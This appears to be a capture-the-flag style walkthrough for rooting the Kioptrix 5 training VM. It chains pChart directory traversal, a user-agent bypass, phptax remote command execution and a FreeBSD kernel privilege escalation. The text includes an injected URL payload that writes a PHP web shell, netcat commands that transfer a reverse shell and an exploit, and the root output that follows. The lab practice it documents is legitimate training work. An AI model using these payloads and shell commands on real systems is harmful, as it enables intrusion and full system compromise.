Rooting Kioptrix 5 Walkthrough


Kioptrix 5 is B2R VM designed for students to practice vulnerability analysis and exploitation. Objective is to root this virtual machine by exploiting possible vulnerabilities leading to full system compromise

Vulnerabilities Exploited:

  • Local File Inclusion
  • Remote Command Execution phptax application
  • FreeBSD 9.0 – Intel SYSRET Kernel Privilege Escalation

Lab Setup:

  • VMWare workstation for Virtual Machines
  • Kali Linux VM in Bridge mode
  • Kioptrix Final in Bridge mode

Tools Used:

  • Kali Linux VM
  • netdiscover
  • nmap



root@kali:~# netdiscover

 Currently scanning:   |   Screen View: Unique Hosts                                                               
 3 Captured ARP Req/Rep packets, from 3 hosts.   Total size: 180                                                                    
   IP            At MAC Address     Count     Len  MAC Vendor / Hostname     
 -----------------------------------------------------------------------------   00:0c:29:75:b1:92      1      60  VMware, Inc.   

Target VM IP Address:

Scanning with nmap

root@kali:~# nmap -p- -A
Starting Nmap 7.70 ( ) at 2018-05-30 23:27 EDT
Nmap scan report for
Host is up (0.00059s latency).
Not shown: 65532 filtered ports
22/tcp   closed ssh
80/tcp   open   http    Apache httpd 2.2.21 ((FreeBSD) mod_ssl/2.2.21 OpenSSL/0.9.8q DAV/2 PHP/5.3.8)
8080/tcp open   http    Apache httpd 2.2.21 ((FreeBSD) mod_ssl/2.2.21 OpenSSL/0.9.8q DAV/2 PHP/5.3.8)
|_http-title: 403 Forbidden
MAC Address: 00:0C:29:75:B1:92 (VMware)
Too many fingerprints match this host to give specific OS details
Network Distance: 1 hop
1   0.59 ms
OS and Service detection performed. Please report any incorrect results at .
Nmap done: 1 IP address (1 host up) scanned in 136.26 seconds

Lets explore services in opened ports. I found webserver is runing on port 8080, and resources are forbidden. We dont have access to this server.

Moving forward, default page is visible for website on port 80.

Viewing page source give us hint as comment to pChart version 2.1.3 application.

Here is our pChart application.


Lets search for exploits in exploitdb for pChart application.


root@kali:~# searchsploit pChart 2.1.3
-------------------------------------------------------------------------------------------- ----------------------------------------
Exploit Title                                                                              |  Path
| (/usr/share/exploitdb/)
-------------------------------------------------------------------------------------------- ----------------------------------------
pChart 2.1.3 - Multiple Vulnerabilities                                                     | exploits/php/webapps/31173.txt
-------------------------------------------------------------------------------------------- ----------------------------------------
Shellcodes: No Result
Papers: No Result

So, there is directory traversal vulnerability, that allow us to read arbitrary files from server.

Next, part of story is, we are forbidden to access any resource on port 8080, and that configuration is stored in httpd.conf of web-server. So, lets read httpd.conf and see what configuration is done in httpd.conf, and what we can do to bypass that restriction.

As, we can see, all browsers are allowed access to server that start with ^Mozilla/4.0.

So, i overrided user agent string in firefox to Mozilla/4.0.

New String created is general.useragent.override with value Mozilla/4.0



Access to server is granted.

Now, we found phptax application. Lets search for exploits. And, guess what, we found Remote Command Execution Vulnerability, we can execute arbitrary commands on server.

root@kali:~# searchsploit phptax
-------------------------------------------------------------------------------------------- ----------------------------------------
Exploit Title                                                                              |  Path
| (/usr/share/exploitdb/)
-------------------------------------------------------------------------------------------- ----------------------------------------
PhpTax - 'pfilez' Execution Remote Code Injection (Metasploit)                              | exploits/php/webapps/21833.rb
PhpTax 0.8 - File Manipulation 'newvalue' / Remote Code Execution                           | exploits/php/webapps/25849.txt
phptax 0.8 - Remote Code Execution                                                          | exploits/php/webapps/21665.txt
-------------------------------------------------------------------------------------------- ----------------------------------------
Shellcodes: No Result
Papers: No Result

Lets read through exploit code.

root@kali:~# cat /usr/share/exploitdb/exploits/php/webapps/21665.txt
phptax 0.8 <= Remote Code Execution Vulnerability
Discovered by: Jean Pascal Pereira <>
Vendor information:
"PhpTax is free software to do your U.S. income taxes. Tested under Unix environment.
The program generates .pdfs that can be printed and sent to the IRS. See homepage for details and screenshot."
Vendor URI:
Risk-level: High
The application is prone to a remote code execution vulnerability.
drawimage.php, line 63:
include ("./files/$_GET[pfilez]");
// makes a png image
Header("Content-type: image/png");
if ($_GET[pdf] == "") Imagepng($image);
if ($_GET[pdf] == "make") Imagepng($image,"./data/pdf/$pfilef");
if ($_GET[pdf] == "make") exec("convert ./data/pdf/$pfilef ./data/pdf/$pfilep");
Exploit / Proof of Concept:
Bindshell on port 23235 using netcat:
** Exploit-DB Verified:**
Do some input validation.

We want to execute this command on server shell.

echo “<?php system(\$_GET[‘cmd’]); ?>” > shell.php

this command will create a simple php shell that can execute commands.;%20echo%20%22%3C%3Fphp%20system($_GET%5B%27cmd%27%5D);%20%3F%3E%22%20%3E%20shell.php&pdf=make

Our shell is uploaded at and we can execute commands. Lets find whether wget, nc is installed on server.

nc is installed.

Lets use nc to get interactive shell. we will upload pentestmonkey’s php netcat shell.

root@kali:~# nc -nvlp 1234 < /var/www/html/shell.txt

listening on [any] 1234 ...

On server, we will upload php shell using this command.

nc 1234 > rshell.php

So, our rshell.php is uploaded, lets access this rshell.php in browser and receive reverse connect netcat shell.

Privilege Escalation

$ uname -a
FreeBSD kioptrix2014 9.0-RELEASE FreeBSD 9.0-RELEASE #0: Tue Jan  3 07:46:30 UTC 2012  amd64

On kali linux: #nc -nvlp 12345 < exploit.c

I transferred this c shell to server using nc. Compiled, executed, and rooted machine!

$ nc 12345 > /tmp/exploit.c
$ cd /tmp
$ gcc -o exploit exploit.c
$ ./exploit
[+] Start Engine...
[+] Crotz...
[+] Crotz...
[+] Crotz...
[+] Woohoo!!!
$ id
uid=0(root) gid=0(wheel) groups=0(wheel)


Leave a Reply

Fill in your details below or click an icon to log in: Logo

You are commenting using your account. Log Out /  Change )

Twitter picture

You are commenting using your Twitter account. Log Out /  Change )

Facebook photo

You are commenting using your Facebook account. Log Out /  Change )

Connecting to %s